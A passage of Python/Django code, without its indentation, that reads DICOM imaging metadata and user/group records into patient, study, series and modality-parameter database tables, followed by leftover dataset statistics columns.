Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
################################################################################
# this case is when we have to create each tables
# for the user and group it is the same the previous case.
################################################################################
else:
################# Patient table ###################
try:
PatientID=ds.PatientID
except NameError:
PatientID = 'undefined'
except AttributeError:
PatientID = 'undefined'
try:
PatientName=ds.PatientName
except NameError:
PatientName = 'undefined'
except AttributeError:
PatientName = 'undefined'
try:
PatientAge=ds.PatientAge
except NameError:
PatientAge = 'undefined'
except AttributeError:
PatientAge = 'undefined'
try:
PatientSex=ds.PatientSex
except NameError:
PatientSex = 'undefined'
except AttributeError:
PatientSex = 'undefined'
try:
PatientBirthDate=ds.PatientBirthDate
except NameError:
PatientBirthDate = 'undefined'
except AttributeError:
PatientBirthDate = 'undefined'
try:
PatientBirthTime=ds.PatientBirthTime
except NameError:
PatientBirthTime = 'undefined'
except AttributeError:
PatientBirthTime = 'undefined'
b1=Patient(PatientID=PatientID, PatientAge=PatientAge, PatientSex=PatientSex,PatientName=PatientName,
PatientBirthDate=PatientBirthDate, PatientBirthTime=PatientBirthTime)
b1.save()
################## Study table ####################
try:
StudyDescription=ds.StudyDescription
except NameError:
StudyDescription = 'undefined'
except AttributeError:
StudyDescription = 'undefined'
try:
StationName=ds.StationName
except NameError:
StationName = 'undefined'
except AttributeError:
StationName = 'undefined'
try:
ManufacturerModelName=ds.ManufacturerModelName
except NameError:
ManufacturerModelName = 'undefined'
except AttributeError:
ManufacturerModelName = 'undefined'
try:
StudyInstanceUID=str(ds.StudyInstanceUID)
except NameError:
StudyInstanceUID = 'undefined'
except AttributeError:
StudyInstanceUID = 'undefined'
try:
Pathology=ds.Pathology
except NameError:
Pathology = 'undefined'
except AttributeError:
Pathology = 'undefined'
try:
StudyDate=ds.StudyDate
except NameError:
StudyDate = 'undefined'
except AttributeError:
StudyDate = 'undefined'
try:
StudyTime=ds.StudyTime
except NameError:
StudyTime = 'undefined'
except AttributeError:
StudyTime = 'undefined'
try:
AccessionNumber=ds.AccessionNumber
except NameError:
AccessionNumber = 'undefined'
except AttributeError:
AccessionNumber = 'undefined'
try:
InstitutionName=ds.InstitutionName
except NameError:
InstitutionName = 'undefined'
except AttributeError:
InstitutionName = 'undefined'
try:
ReferringPhysicianName=ds.ReferringPhysicianName
except NameError:
ReferringPhysicianName = 'undefined'
except AttributeError:
ReferringPhysicianName = 'undefined'
try:
PerformingPhysicianName=ds.PerformingPhysicianName
except NameError:
PerformingPhysicianName = 'undefined'
except AttributeError:
PerformingPhysicianName = 'undefined'
try:
ModalitiesInStudy=ds.ModalitiesInStudy
except NameError:
ModalitiesInStudy = 'undefined'
except AttributeError:
ModalitiesInStudy = 'undefined'
try:
MagneticFieldStrength=ds.MagneticFieldStrength
except NameError:
MagneticFieldStrength = 0
except AttributeError:
MagneticFieldStrength = 0
b2=Study(StudyDescription=StudyDescription,StationName=StationName,ManufacturerModelName=ManufacturerModelName,
StudyInstanceUID=StudyInstanceUID,Pathology=Pathology,StudyDate=StudyDate,
StudyTime=StudyTime,AccessionNumber=AccessionNumber,InstitutionName=InstitutionName,
ReferringPhysicianName=ReferringPhysicianName,ModalitiesInStudy=ModalitiesInStudy,
MagneticFieldStrength=MagneticFieldStrength,patient=b1)
b2.save()
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=b2)
b3.save()
#group and user
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
#searchSUser = Series.objects.filter(user__GroupId__startswith=)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,Project=Project)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
| 39.557181
| 146
| 0.406512
| 3,378
| 59,494
| 7.129366
| 0.066311
| 0.088444
| 0.168584
| 0.014616
| 0.888386
| 0.879251
| 0.876261
| 0.876261
| 0.876261
| 0.876261
| 0
| 0.002433
| 0.495764
| 59,494
| 1,503
| 147
| 39.5835
| 0.80036
| 0.047114
| 0
| 0.94785
| 0
| 0
| 0.060213
| 0.002311
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000915
| false
| 0.000915
| 0.002745
| 0
| 0.005489
| 0.016468
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.